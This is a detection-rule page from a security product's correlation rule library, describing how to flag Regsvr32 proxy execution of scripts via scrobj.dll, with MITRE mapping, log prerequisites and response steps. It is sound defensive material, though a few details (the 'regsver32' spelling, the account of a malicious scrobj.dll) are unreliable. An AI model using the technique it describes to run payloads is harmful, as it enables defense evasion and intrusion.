- Home
- Correlation Rule Library
- Regsvr32 exploitation
Regsvr32 exploitation
Rule added on 30th May, 2024In this page
Rule type:
Correlation
Rule description:
Regsvr32 is a Windows command line tool that is used by administrators to register and unregister Dynamic Link Library (DLL) and Object Linking & Embedding (OLE) files. This ensures that the files are integrated with the Windows registry.
Attackers often use Regsvr32 to execute malicious scripts or loads DLLs into memory as the tool is in the application whitelisting list and may avoid triggering security tools.
Attack chain scenario: Phishing -> Regsvr32-based payload execution -> Data breach
Impact:
It can be used by adversaries in the following ways:
- Persistence
- Data breach
- Loss of data integrity
Data source:
Windows > Process Creation
Required configuration: The rule is based on the process creation and termination. Prerequisites required are installing and configuring Sysmon, enabling audit process creation audit policy, and the command line auditing.
Relevant MITRE ATT&CK techniques and tactics:
Tactic: TA0005- Defense Evasion
Technique: T1218- System Binary Proxy Execution
Sub Technique: T1218.010- Regsvr32
Criteria:
( ( Command Line contains "regsvr32" ) AND ( Command Line contains "scrobj.dll" )
Attackers may use regsvr32.exe to execute malicious scripts and payloads.
scrobj.dll - It is a DLL file associated with Windows Script Component runtime. Attackers may use regsvr32.exe to register a malicious version of scrobj.dll enabling them to evade detection mechanisms.
When to enable this rule:
Security standards (NIST CSF 2.0):
Enabling this rule will help you meet the security standards' requirements listed below:
DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events
When this rule is triggered, you're notified when regsver32.exe is used for the proxy execution of malicious code.
This enables you to monitor the use of commands such as regsver32.exe.
Known false positives: Some music management or media software may use regsvr32.exe to register a legitimate scrobj.dll for its operations.
Next steps:
When this alert is triggered, the following measures can be implemented:
- Identification: Identify if the alert is a new incident or part of an existing incident.
- Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
- Response: Respond promptly by initiating an automated workflow to cease the malicious process.
- Least privilege principle: Ensure that the use of regsvr32.exe is limited to authorized users only.
